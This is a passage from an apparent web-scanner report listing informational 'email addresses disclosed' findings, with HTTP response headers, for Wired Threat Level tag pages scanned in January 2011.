...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.111. http://www.wired.com/threatlevel/tag/nsa/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/nsa/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:50:18 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:42:32 GMT
Date: Wed, 12 Jan 2011 15:34:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 125117

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.112. http://www.wired.com/threatlevel/tag/obama/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/obama/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:17 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=452
Expires: Wed, 12 Jan 2011 15:42:06 GMT
Date: Wed, 12 Jan 2011 15:34:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 116873

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.113. http://www.wired.com/threatlevel/tag/piracy/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/piracy/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
editor@wired.co.uk
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:19 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Wed, 12 Jan 2011 15:42:52 GMT
Date: Wed, 12 Jan 2011 15:34:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 112607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:editor@wired.co.uk">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.114. http://www.wired.com/threatlevel/tag/pirate-bay-trial/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/pirate-bay-trial/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
jacqui@arstechnica.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 13:16:37 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:43:12 GMT
Date: Wed, 12 Jan 2011 15:35:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 129512

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:jacqui@arstechnica.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.115. http://www.wired.com/threatlevel/tag/pirate-bay/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/pirate-bay/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
editor@wired.co.uk
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 13:51:58 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=472
Expires: Wed, 12 Jan 2011 15:42:59 GMT
Date: Wed, 12 Jan 2011 15:35:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 114696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:editor@wired.co.uk">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.116. http://www.wired.com/threatlevel/tag/politics/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/politics/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

7.117. http://www.wired.com/threatlevel/tag/privacy/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/privacy/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:20:21 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=434
Expires: Wed, 12 Jan 2011 15:42:38 GMT
Date: Wed, 12 Jan 2011 15:35:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 123046

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.118. http://www.wired.com/threatlevel/tag/riaa/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/riaa/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:24 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Wed, 12 Jan 2011 15:43:29 GMT
Date: Wed, 12 Jan 2011 15:35:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 115752

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.119. http://www.wired.com/threatlevel/tag/segvec/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/segvec/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:26 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Wed, 12 Jan 2011 15:43:37 GMT
Date: Wed, 12 Jan 2011 15:35:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 133630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.120. http://www.wired.com/threatlevel/tag/supreme-court/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/supreme-court/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:27 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Wed, 12 Jan 2011 15:43:38 GMT
Date: Wed, 12 Jan 2011 15:35:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 113521

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.121. http://www.wired.com/threatlevel/tag/surveillance/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/surveillance/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:12:06 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:43:39 GMT
Date: Wed, 12 Jan 2011 15:35:39 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 126273

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.122. http://www.wired.com/threatlevel/tag/tjx/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/tjx/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:28 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Wed, 12 Jan 2011 15:43:40 GMT
Date: Wed, 12 Jan 2011 15:35:40 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 130344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.123. http://www.wired.com/threatlevel/tag/tsa/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/tsa/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:30 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=443
Expires: Wed, 12 Jan 2011 15:43:03 GMT
Date: Wed, 12 Jan 2011 15:35:40 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 119445

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.124. http://www.wired.com/threatlevel/tag/twitter/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/twitter/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:54:02 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=459
Expires: Wed, 12 Jan 2011 15:43:21 GMT
Date: Wed, 12 Jan 2011 15:35:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.125. http://www.wired.com/threatlevel/tag/virginia-tech-shootings/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/virginia-tech-shootings/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:06:15 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=477
Expires: Wed, 12 Jan 2011 15:43:41 GMT
Date: Wed, 12 Jan 2011 15:35:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 108575

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.126. http://www.wired.com/threatlevel/tag/wikileaks/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/wikileaks/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan@ryansingel.net
